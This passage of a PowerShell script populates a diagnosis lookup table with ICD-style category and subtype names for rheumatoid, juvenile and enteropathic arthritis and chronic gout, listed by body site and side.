arthritis, hand","Other specified rheumatoid arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, hip","Other specified rheumatoid arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, hip","Other specified rheumatoid arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, hip","Other specified rheumatoid arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, knee","Other specified rheumatoid arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, knee","Other specified rheumatoid arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, knee","Other specified rheumatoid arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, ankle and foot","Other specified rheumatoid arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, ankle and foot","Other specified rheumatoid arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, ankle and foot","Other specified rheumatoid arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, vertebrae","Other specified rheumatoid arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Other specified rheumatoid arthritis, multiple sites","Other specified rheumatoid arthritis, multiple sites") + $null = $DiagnosisList.Rows.Add("Rheumatoid arthritis, unspecified","Rheumatoid arthritis, unspecified") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies","Enteropathic arthropathies, unspecified site") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, shoulder","Enteropathic arthropathies, right shoulder") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, shoulder","Enteropathic arthropathies, left shoulder") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, shoulder","Enteropathic arthropathies, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, elbow","Enteropathic arthropathies, right elbow") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, elbow","Enteropathic arthropathies, left elbow") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, elbow","Enteropathic arthropathies, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, wrist","Enteropathic arthropathies, right wrist") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, wrist","Enteropathic arthropathies, left wrist") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, wrist","Enteropathic arthropathies, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hand","Enteropathic arthropathies, right hand") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hand","Enteropathic arthropathies, left hand") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hand","Enteropathic arthropathies, unspecified hand") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hip","Enteropathic arthropathies, right hip") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hip","Enteropathic arthropathies, left hip") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, hip","Enteropathic arthropathies, unspecified hip") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, knee","Enteropathic arthropathies, right knee") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, knee","Enteropathic arthropathies, left knee") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, knee","Enteropathic arthropathies, unspecified knee") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, ankle and foot","Enteropathic arthropathies, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, ankle and foot","Enteropathic arthropathies, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, ankle and foot","Enteropathic arthropathies, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, vertebrae","Enteropathic arthropathies, vertebrae") + $null = $DiagnosisList.Rows.Add("Enteropathic arthropathies, multiple sites","Enteropathic arthropathies, multiple sites") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis","Unspecified juvenile rheumatoid arthritis of unspecified site") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, shoulder","Unspecified juvenile rheumatoid arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, shoulder","Unspecified juvenile rheumatoid arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, shoulder","Unspecified juvenile rheumatoid arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis of elbow","Unspecified juvenile rheumatoid arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis of elbow","Unspecified juvenile rheumatoid arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis of elbow","Unspecified juvenile rheumatoid arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, wrist","Unspecified juvenile rheumatoid arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, wrist","Unspecified juvenile rheumatoid arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, wrist","Unspecified juvenile rheumatoid arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hand","Unspecified juvenile rheumatoid arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hand","Unspecified juvenile rheumatoid arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hand","Unspecified juvenile rheumatoid arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hip","Unspecified juvenile rheumatoid arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hip","Unspecified juvenile rheumatoid arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, hip","Unspecified juvenile rheumatoid arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, knee","Unspecified juvenile rheumatoid arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, knee","Unspecified juvenile rheumatoid arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, knee","Unspecified juvenile rheumatoid arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, ankle and foot","Unspecified juvenile rheumatoid arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, ankle and foot","Unspecified juvenile rheumatoid arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, ankle and foot","Unspecified juvenile rheumatoid arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, vertebrae","Unspecified juvenile rheumatoid arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Unspecified juvenile rheumatoid arthritis, multiple sites","Unspecified juvenile rheumatoid arthritis, multiple sites") + $null = $DiagnosisList.Rows.Add("Juvenile ankylosing spondylitis","Juvenile ankylosing spondylitis") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset","Juvenile rheumatoid arthritis with systemic onset, unspecified site") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, shoulder","Juvenile rheumatoid arthritis with systemic onset, right shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, shoulder","Juvenile rheumatoid arthritis with systemic onset, left shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, shoulder","Juvenile rheumatoid arthritis with systemic onset, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, elbow","Juvenile rheumatoid arthritis with systemic onset, right elbow") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, elbow","Juvenile rheumatoid arthritis with systemic onset, left elbow") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, elbow","Juvenile rheumatoid arthritis with systemic onset, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, wrist","Juvenile rheumatoid arthritis with systemic onset, right wrist") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, wrist","Juvenile rheumatoid arthritis with systemic onset, left wrist") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, wrist","Juvenile rheumatoid arthritis with systemic onset, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hand","Juvenile rheumatoid arthritis with systemic onset, right hand") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hand","Juvenile rheumatoid arthritis with systemic onset, left hand") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hand","Juvenile rheumatoid arthritis with systemic onset, unspecified hand") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hip","Juvenile rheumatoid arthritis with systemic onset, right hip") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hip","Juvenile rheumatoid arthritis with systemic onset, left hip") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, hip","Juvenile rheumatoid arthritis with systemic onset, unspecified hip") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, knee","Juvenile rheumatoid arthritis with systemic onset, right knee") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, knee","Juvenile rheumatoid arthritis with systemic onset, left knee") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, knee","Juvenile rheumatoid arthritis with systemic onset, unspecified knee") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, ankle and foot","Juvenile rheumatoid arthritis with systemic onset, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, ankle and foot","Juvenile rheumatoid arthritis with systemic onset, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, ankle and foot","Juvenile rheumatoid arthritis with systemic onset, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, vertebrae","Juvenile rheumatoid arthritis with systemic onset, vertebrae") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid arthritis with systemic onset, multiple sites","Juvenile rheumatoid arthritis with systemic onset, multiple sites") + $null = $DiagnosisList.Rows.Add("Juvenile rheumatoid polyarthritis (seronegative)","Juvenile rheumatoid polyarthritis (seronegative)") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis","Pauciarticular juvenile rheumatoid arthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, shoulder","Pauciarticular juvenile rheumatoid arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, shoulder","Pauciarticular juvenile rheumatoid arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, shoulder","Pauciarticular juvenile rheumatoid arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, elbow","Pauciarticular juvenile rheumatoid arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, elbow","Pauciarticular juvenile rheumatoid arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, elbow","Pauciarticular juvenile rheumatoid arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, wrist","Pauciarticular juvenile rheumatoid arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, wrist","Pauciarticular juvenile rheumatoid arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, wrist","Pauciarticular juvenile rheumatoid arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hand","Pauciarticular juvenile rheumatoid arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hand","Pauciarticular juvenile rheumatoid arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hand","Pauciarticular juvenile rheumatoid arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hip","Pauciarticular juvenile rheumatoid arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hip","Pauciarticular juvenile rheumatoid arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, hip","Pauciarticular juvenile rheumatoid arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, knee","Pauciarticular juvenile rheumatoid arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, knee","Pauciarticular juvenile rheumatoid arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, knee","Pauciarticular juvenile rheumatoid arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, ankle and foot","Pauciarticular juvenile rheumatoid arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, ankle and foot","Pauciarticular juvenile rheumatoid arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, ankle and foot","Pauciarticular juvenile rheumatoid arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Pauciarticular juvenile rheumatoid arthritis, vertebrae","Pauciarticular juvenile rheumatoid arthritis, vertebrae") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis","Other juvenile arthritis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, shoulder","Other juvenile arthritis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, shoulder","Other juvenile arthritis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, shoulder","Other juvenile arthritis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, elbow","Other juvenile arthritis, right elbow") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, elbow","Other juvenile arthritis, left elbow") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, elbow","Other juvenile arthritis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, wrist","Other juvenile arthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, wrist","Other juvenile arthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, wrist","Other juvenile arthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hand","Other juvenile arthritis, right hand") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hand","Other juvenile arthritis, left hand") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hand","Other juvenile arthritis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hip","Other juvenile arthritis, right hip") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hip","Other juvenile arthritis, left hip") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, hip","Other juvenile arthritis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, knee","Other juvenile arthritis, right knee") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, knee","Other juvenile arthritis, left knee") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, knee","Other juvenile arthritis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, ankle and foot","Other juvenile arthritis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, ankle and foot","Other juvenile arthritis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, ankle and foot","Other juvenile arthritis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, other specified site","Other juvenile arthritis, other specified site") + $null = $DiagnosisList.Rows.Add("Other juvenile arthritis, multiple sites","Other juvenile arthritis, multiple sites") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified","Juvenile arthritis, unspecified, unspecified site") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, shoulder","Juvenile arthritis, unspecified, right shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, shoulder","Juvenile arthritis, unspecified, left shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, shoulder","Juvenile arthritis, unspecified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, elbow","Juvenile arthritis, unspecified, right elbow") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, elbow","Juvenile arthritis, unspecified, left elbow") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, elbow","Juvenile arthritis, unspecified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, wrist","Juvenile arthritis, unspecified, right wrist") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, wrist","Juvenile arthritis, unspecified, left wrist") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, wrist","Juvenile arthritis, unspecified, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hand","Juvenile arthritis, unspecified, right hand") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hand","Juvenile arthritis, unspecified, left hand") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hand","Juvenile arthritis, unspecified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hip","Juvenile arthritis, unspecified, right hip") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hip","Juvenile arthritis, unspecified, left hip") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, hip","Juvenile arthritis, unspecified, unspecified hip") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, knee","Juvenile arthritis, unspecified, right knee") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, knee","Juvenile arthritis, unspecified, left knee") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, knee","Juvenile arthritis, unspecified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, ankle and foot","Juvenile arthritis, unspecified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, ankle and foot","Juvenile arthritis, unspecified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, ankle and foot","Juvenile arthritis, unspecified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, vertebrae","Juvenile arthritis, unspecified, vertebrae") + $null = $DiagnosisList.Rows.Add("Juvenile arthritis, unspecified, multiple sites","Juvenile arthritis, unspecified, multiple sites") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified site","Idiopathic chronic gout, unspecified site, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified site","Idiopathic chronic gout, unspecified site, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right shoulder","Idiopathic chronic gout, right shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right shoulder","Idiopathic chronic gout, right shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left shoulder","Idiopathic chronic gout, left shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left shoulder","Idiopathic chronic gout, left shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified shoulder","Idiopathic chronic gout, unspecified shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified shoulder","Idiopathic chronic gout, unspecified shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right elbow","Idiopathic chronic gout, right elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right elbow","Idiopathic chronic gout, right elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left elbow","Idiopathic chronic gout, left elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left elbow","Idiopathic chronic gout, left elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified elbow","Idiopathic chronic gout, unspecified elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified elbow","Idiopathic chronic gout, unspecified elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right wrist","Idiopathic chronic gout, right wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right wrist","Idiopathic chronic gout, right wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left wrist","Idiopathic chronic gout, left wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left wrist","Idiopathic chronic gout, left wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified wrist","Idiopathic chronic gout, unspecified wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified wrist","Idiopathic chronic gout, unspecified wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right hand","Idiopathic chronic gout, right hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right hand","Idiopathic chronic gout, right hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left hand","Idiopathic chronic gout, left hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left hand","Idiopathic chronic gout, left hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified hand","Idiopathic chronic gout, unspecified hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified hand","Idiopathic chronic gout, unspecified hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right hip","Idiopathic chronic gout, right hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right hip","Idiopathic chronic gout, right hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left hip","Idiopathic chronic gout, left hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left hip","Idiopathic chronic gout, left hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified hip","Idiopathic chronic gout, unspecified hip, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified hip","Idiopathic chronic gout, unspecified hip, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right knee","Idiopathic chronic gout, right knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right knee","Idiopathic chronic gout, right knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left knee","Idiopathic chronic gout, left knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left knee","Idiopathic chronic gout, left knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified knee","Idiopathic chronic gout, unspecified knee, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified knee","Idiopathic chronic gout, unspecified knee, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right ankle and foot","Idiopathic chronic gout, right ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, right ankle and foot","Idiopathic chronic gout, right ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left ankle and foot","Idiopathic chronic gout, left ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, left ankle and foot","Idiopathic chronic gout, left ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified ankle and foot","Idiopathic chronic gout, unspecified ankle and foot, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, unspecified ankle and foot","Idiopathic chronic gout, unspecified ankle and foot, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, vertebrae","Idiopathic chronic gout, vertebrae, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, vertebrae","Idiopathic chronic gout, vertebrae, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, multiple sites","Idiopathic chronic gout, multiple sites, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Idiopathic chronic gout, multiple sites","Idiopathic chronic gout, multiple sites, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified site","Lead-induced chronic gout, unspecified site, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified site","Lead-induced chronic gout, unspecified site, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right shoulder","Lead-induced chronic gout, right shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right shoulder","Lead-induced chronic gout, right shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left shoulder","Lead-induced chronic gout, left shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left shoulder","Lead-induced chronic gout, left shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified shoulder","Lead-induced chronic gout, unspecified shoulder, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified shoulder","Lead-induced chronic gout, unspecified shoulder, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right elbow","Lead-induced chronic gout, right elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right elbow","Lead-induced chronic gout, right elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left elbow","Lead-induced chronic gout, left elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left elbow","Lead-induced chronic gout, left elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified elbow","Lead-induced chronic gout, unspecified elbow, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified elbow","Lead-induced chronic gout, unspecified elbow, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right wrist","Lead-induced chronic gout, right wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right wrist","Lead-induced chronic gout, right wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left wrist","Lead-induced chronic gout, left wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left wrist","Lead-induced chronic gout, left wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified wrist","Lead-induced chronic gout, unspecified wrist, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified wrist","Lead-induced chronic gout, unspecified wrist, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right hand","Lead-induced chronic gout, right hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right hand","Lead-induced chronic gout, right hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left hand","Lead-induced chronic gout, left hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, left hand","Lead-induced chronic gout, left hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified hand","Lead-induced chronic gout, unspecified hand, without tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, unspecified hand","Lead-induced chronic gout, unspecified hand, with tophus (tophi)") + $null = $DiagnosisList.Rows.Add("Lead-induced chronic gout, right hip","Lead-induced chronic gout, right hip, without 